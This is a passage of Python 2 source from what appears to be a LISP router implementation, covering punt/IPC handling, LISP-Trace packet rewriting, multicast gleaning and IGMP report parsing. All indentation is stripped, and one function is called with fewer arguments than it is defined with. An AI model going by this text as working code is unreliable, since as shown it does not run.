def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["latencies"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check where there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR runnnig as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return dictionary arraay if json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if (tel.has_key("type") == False): return(None)
if (tel.has_key("sub-type") == False): return(None)
if (tel["type"] != "telemetry"): return(None)
